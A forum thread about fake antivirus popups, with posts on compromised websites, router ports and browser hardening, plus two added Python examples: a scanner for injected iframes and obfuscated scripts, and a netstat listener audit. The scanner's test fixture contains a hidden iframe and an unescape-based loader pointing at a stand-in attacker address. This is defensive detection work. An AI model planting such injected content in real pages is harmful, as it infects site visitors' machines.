
A thought on these pop up virus attacks

binki

New Member
We have had a few of these and I am scratching my head on how they are getting in. These are the popups that say you have a virus, click here to fix and all hell breaks loose afterward.

Here is what I think so far. I have experience on 4 networks. On 2 of the networks we turn the router off every night. The other 2 stay on 24x7.

Now I am not sure but I believe we get a new IP when we restart the router.

My thought is the networks that stay on all the time are being pounced on just randomly, kind of like fishing. The ones that turn off don't have the problem because they are not always available.

Not sure if this theory holds water but that is the only difference I can find so far.

Can anyone else offer some corroboration on this?
 

SignBurst PCs

New Member
I think that you are on the wrong track.

First, you probably have multi-day leases on your IP addresses. If your router is down for several hours, you will still get the same IP when you return. This has almost nothing to do with being infected.

You are probably not getting these malware infections by being hacked (through the router). These infections are mainly spread through infected websites and others through email. There are other possible ways to be infected, but they are statistically rare.

Casual surfing is usually the cause for these infections. I always recommend that my clients keep "unnecessary" surfing to a minimum on their critical computers as it is usually the cause of their infection and frustration.
 

binki

New Member
The sites visited on one of the networks that got an infection were normal sites. What the font, fonts 101 and the like when I got the last attack.

Could it be one of those sites got infected and was pushing bad stuff?
 

SignBurst PCs

New Member
> The sites visited on one of the networks that got an infection were normal sites. What the font, fonts 101 and the like when I got the last attack.
>
> Could it be one of those sites got infected and was pushing bad stuff?

Absolutely. ANY web site/server can be infected. Some are much safer than others. In general, the less mainstream the website, the more likely it is to be compromised. This is not always true, but it is a good thing to remember.
 

veloxgraphics

New Member
Also... running NoScript in Firefox GREATLY reduces what automated processes within websites can do to your computer.

Smart surfing is the best practice, however. I don't know how many times someone has called me to fix their machine, and will swear up and down that they were working within an antivirus program to clean something from the machine. So I show them how the top of their "antivirus" program still said "Internet Explorer."

Just because it looks like an application, doesn't mean it is.
 

David Wright

New Member
We got another last night. For sure it came from a link on yahoo.news.
My wife started to show me an article linked to the son of Marie Osmond story and the bogus virus/windows security update needed crap came up and locked me out of task manager. Closed right out and went into safe mode and windows restore and fixed it.

This is all too common now.
 

binki

New Member
> We got another last night. For sure it came from a link on yahoo.news.
> My wife started to show me an article linked to the son of Marie Osmond story and the bogus virus/windows security update needed crap came up and locked me out of task manager. Closed right out and went into safe mode and windows restore and fixed it.
>
> This is all too common now.

Yeah, we get some of that too. It is funny because when we run Shields Up we seem to be pretty well protected.
 

Techman

New Member
They come in from compromised websites.

There are a few java exploits going around. The webmaster doesn't keep up with the java updates, or is a little slow on his update, or a new exploit is found and the maggots send it out to every website on the planet before an update can be installed.

When the java server is not updated the maggots get in, redirect your browser to that popup and it loads up. If you say no it loads, if you say yes it loads. That is why popunders or popups are not good when used on a website. Many people know maggots use those to infect machines.

It only takes a few seconds and it's in.
Or, you open an email with some type of script in it. Usually one of those email greetings cards.

Or you get a crack (either kind) from some underworld site and open it. A new meaning to dirty pictures? ;)

There is scanning, intercepts, probing, and noise all over the internet. If one were to get a port monitor they would see just how much wild probing is going on all the time every day. Much of it is legal, some of it is seekers doing searches for very rare data and some of it is just looking around just as a neighbor looks into your garage from the street.

That is why a router and a firewall are so important. A PC was designed to have 64,000 open ports to do anything you can dream of. That is the power of a PC. It is so open you can make a PC do anything you can imagine. Some try to make this open ability a handicap while others would rather die than see a PC turn into a locked box. But, those ports must be closed when not in use.
 
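Techman's post describes the mechanism behind most of the infections in this thread: a legitimate site is compromised and a small piece of injected content (a hidden iframe or an obfuscated script) redirects the visitor to the fake-AV page. Below is an added example, not code from the thread, of the kind of heuristic scan a site owner or support tech can run over a fetched page to spot that injection. The two sample pages and the host name `fonts.example` are constructed for the example; `203.0.113.5` is a documentation address standing in for the attacker's redirect server.

```python
"""Heuristic scan of a fetched HTML page for injected drive-by content.

Added example, not code from the thread. The two sample pages and the
host name fonts.example are constructed; 203.0.113.5 is a documentation
address standing in for the attacker's redirect server.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _Collector(HTMLParser):
    """Pull out iframes, external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # attribute dicts of every <iframe>
        self.script_srcs = []      # src of every <script src=...>
        self.inline_scripts = []   # text of every inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            self.iframes.append(a)
        elif tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline_scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _is_hidden(attrs):
    """True for the 0x0 / display:none iframes used to load a payload silently."""
    style = (attrs.get("style") or "").replace(" ", "").lower()

    def tiny(v):
        v = (v or "").strip().lower().rstrip("px")
        return v.isdigit() and int(v) <= 1

    return ("display:none" in style or "visibility:hidden" in style
            or tiny(attrs.get("width")) or tiny(attrs.get("height")))


def scan_page(html, page_host, allowed_hosts=()):
    """Return a list of (kind, detail) findings; an empty list means nothing matched.

    allowed_hosts: third-party script hosts the site legitimately uses
    (CDN, analytics), so they are not reported as 'offsite-script'.
    """
    c = _Collector()
    c.feed(html)
    findings = []
    for a in c.iframes:
        src = a.get("src") or ""
        host = urlparse(src).hostname or page_host
        if _is_hidden(a):
            findings.append(("hidden-iframe", src))
        elif host != page_host:
            findings.append(("offsite-iframe", src))
    for src in c.script_srcs:
        host = urlparse(src).hostname
        if host and host != page_host and host not in allowed_hosts:
            findings.append(("offsite-script", src))
    for js in c.inline_scripts:
        # long runs of %XX escapes: payload hidden from a plain-text grep
        if re.search(r"(?:%[0-9a-fA-F]{2}){20,}", js):
            findings.append(("escaped-blob", js.strip()[:40]))
        # decode-then-execute idiom typical of injected loaders
        if re.search(r"\b(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)", js):
            findings.append(("obfuscated-write", js.strip()[:40]))
    return findings


# Constructed sample: the site as its owner published it.
CLEAN_PAGE = """<html><head><title>Fonts</title>
<script src="/js/site.js"></script></head>
<body><h1>Font catalogue</h1>
<iframe src="/preview?font=1" width="400" height="300"></iframe>
</body></html>"""

# Constructed sample: the same page after an attacker appended a loader.
INJECTED_PAGE = CLEAN_PAGE.replace("</body>", """
<iframe src="http://203.0.113.5/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%32%30%33%2E%30%2E%31%31%33%2E%35%22%3E'))</script>
</body>""")


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, scan_page(page, "fonts.example"))
```

The clean page produces no findings; the injected copy reports the hidden iframe and the escaped, self-writing script. The offsite-script check is deliberately allowlisted, because ad networks and CDNs make a bare "foreign host" rule too noisy to act on.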

choucove

New Member
Firewalls block certain pieces of data trying to access your internal network from the internet. For instance some of this data is your website traffic, that is, HTTP documents that you are viewing on your browser have to come through a specific port on the firewall to be allowed access to your internal network. There are also other ports opened for e-mail traffic, data transfers, requesting data sent out onto the web to retrieve websites, the list goes on and on. The problem is that many times there are opened ports that should not be, which allows through data that is unwanted, such as hackers or harmful packets of code.

Now, just because you have a simple router at your location doesn't mean you are completely protected either, even if you have software firewalls running on your computers. It is relatively easy for rogue script to enable ports or allow access through the firewall on your computer. It works, but it's not the one and only answer to your defense. Additionally, while most routers do have a built-in firewall function, they do not do the more powerful functions that are needed. Many only protect or block the very lowest 1024 ports and leave the other 63,000 ports unblocked. They also do not inspect or log port traffic for use in finding weak points or preventing attacks.

This is why a simple investment can be incredibly helpful in protecting your network. Again, it's not going to forever cure every chance of receiving a virus, but it helps against many other things as well.
 
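Techman's remark that ports "must be closed when not in use" and choucove's discussion of which ports a router does or does not block both come down to one practical check: which services on the PC are actually listening, and whether each is reachable from the network or only from the machine itself. A port with nothing listening on it answers nothing, whatever the router does; the listeners on all interfaces are what the random probing on a public address can reach. The following is an added example, not code from the thread, that parses the output of `netstat -ano` (the Windows form, since the thread is about Windows PCs) and reports exposed listeners that are not on a list of expected ports. `NETSTAT_SAMPLE` is constructed output; the PIDs, the LAN address and the `203.0.113.80` web server in it are made up, and the expected-ports set is an assumption about what this shop knowingly runs.

```python
"""Audit which services are actually listening, and on which interfaces,
from the output of `netstat -ano` (Windows). Added example, not code from
the thread; NETSTAT_SAMPLE is constructed output, and the PIDs and the
203.0.113.80 web server in it are made up.
"""

# Constructed sample of `netstat -ano` output.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       1732
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:49321     203.0.113.80:80        ESTABLISHED     3104
  TCP    [::]:135               [::]:0                 LISTENING       880
  UDP    0.0.0.0:137            *:*                                    4
  UDP    127.0.0.1:1900         *:*                                    1120
"""


def _scope(host):
    """Who can reach this socket: 'all' interfaces, 'loopback' only, or one 'interface'."""
    if host in ("0.0.0.0", "[::]", "*"):
        return "all"
    if host.startswith("127.") or host == "[::1]":
        return "loopback"
    return "interface"


def parse_listeners(netstat_text):
    """Yield (proto, port, scope, pid) for every listening TCP or UDP socket."""
    for line in netstat_text.splitlines():
        tok = line.split()
        if not tok or tok[0] not in ("TCP", "UDP"):
            continue
        if tok[0] == "TCP":
            if len(tok) < 5 or tok[3] != "LISTENING":
                continue          # established/time-wait connections are not listeners
            pid = int(tok[4])
        else:
            if len(tok) != 4:
                continue          # UDP rows have no State column
            pid = int(tok[3])
        host, port = tok[1].rsplit(":", 1)
        yield tok[0], int(port), _scope(host), pid


def audit_listeners(netstat_text, expected_ports):
    """Split listeners into loopback-only and network-exposed, and report
    exposed ones not on the expected list. Only network-exposed listeners
    can be reached by the random probing seen on any public address."""
    loopback, exposed = [], []
    for proto, port, scope, pid in parse_listeners(netstat_text):
        (loopback if scope == "loopback" else exposed).append((proto, port, pid))
    unexpected = sorted({e for e in exposed if e[1] not in expected_ports})
    return {"loopback_only": loopback, "exposed": exposed, "unexpected": unexpected}


if __name__ == "__main__":
    # Assumed: file and printer sharing ports this shop knowingly runs on the LAN.
    report = audit_listeners(NETSTAT_SAMPLE, expected_ports={137, 139, 445})
    for proto, port, pid in report["unexpected"]:
        print(f"unexpected {proto}/{port} exposed by PID {pid}")
```

On the sample, the only unexpected exposure is TCP 135 (RPC endpoint mapper) listening on every interface under PID 880; the two loopback-only services are reachable from nobody but the PC itself, which is exactly the state to aim for on a shop machine that never needs to serve the network.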

Graphics2u

New Member
> Firewalls block certain pieces of data trying to access your internal network from the internet. For instance some of this data is your website traffic, that is, HTTP documents that you are viewing on your browser have to come through a specific port on the firewall to be allowed access to your internal network. There are also other ports opened for e-mail traffic, data transfers, requesting data sent out onto the web to retrieve websites, the list goes on and on. The problem is that many times there are opened ports that should not be, which allows through data that is unwanted, such as hackers or harmful packets of code.
>
> Now, just because you have a simple router at your location doesn't mean you are completely protected either, even if you have software firewalls running on your computers. It is relatively easy for rogue script to enable ports or allow access through the firewall on your computer. It works, but it's not the one and only answer to your defense. Additionally, while most routers do have a built-in firewall function, they do not do the more powerful functions that are needed. Many only protect or block the very lowest 1024 ports and leave the other 63,000 ports unblocked. They also do not inspect or log port traffic for use in finding weak points or preventing attacks.
>
> This is why a simple investment can be incredibly helpful in protecting your network. Again, it's not going to forever cure every chance of receiving a virus, but it helps against many other things as well.


Thank You. What does a person need to block all unused ports if a router doesn't block them all?
 

choucove

New Member
> Thank You. What does a person need to block all unused ports if a router doesn't block them all?

The only thing that is going to allow you access to control all ports in your network access is a hardware firewall device. This piece of equipment goes directly between your internet and your own router. There are several options from the best name brands in networking out there especially at affordable costs. Cisco's ASA5505 and Sonicwall TZ100 are some examples of entry-level firewalls that still offer all the features a small business could want.
 

Graphics2u

New Member
> The only thing that is going to allow you access to control all ports in your network access is a hardware firewall device. This piece of equipment goes directly between your internet and your own router. There are several options from the best name brands in networking out there especially at affordable costs. Cisco's ASA5505 and Sonicwall TZ100 are some examples of entry-level firewalls that still offer all the features a small business could want.
That's great info! Thanks!
 

genericname

New Member
> Also... running NoScript in Firefox GREATLY reduces what automated processes within websites can do to your computer.

THIS

Step 1:
Ditch Internet Explorer for Firefox

Step 2:
Install No-Script Addon (If this gives you trouble, the least you could do is go to Tools > Options > Enable Javascript Advanced button > Uncheck all)

Step 3:
Install Adblock Plus Addon

Step 4:
Dance

Nowadays we really need to be on top of our surfing practices. Aside from the passive solutions above, a good rule of thumb is to avoid the hell out of any pop-up that forces you to acknowledge it in order to remove it. As mentioned in a previous post, if it says "Cancel", it probably means "OK". If one of these shows up, don't click on it; just close your browser or, failing that, kill the browser's process in task-manager. Hell, I'd rather hard-boot the PC than click on one of those buggers.
 

binki

New Member
> THIS
> ... if it says "Cancel", it probably means "OK". If one of these shows up, don't click on it; just close your browser or, failing that, kill the browser's process in task-manager. Hell, I'd rather hard-boot the PC than click on one of those buggers.

I first kill the internet connection, then the process unless it starts popping up a bunch of stuff, in that case I reboot.

It helps to have another computer around if needed to get the needed removal tools for special hard cases. Spybot normally takes care of most of the problems. We are currently running NOD32 but will switch to MSE when our contract is up.

We are starting a practice of not connecting our shop computers to the network or internet if they are dedicated to running a machine. In those cases we just use flash drives to move the files.

All files are backed up automagically with Carbonite.
 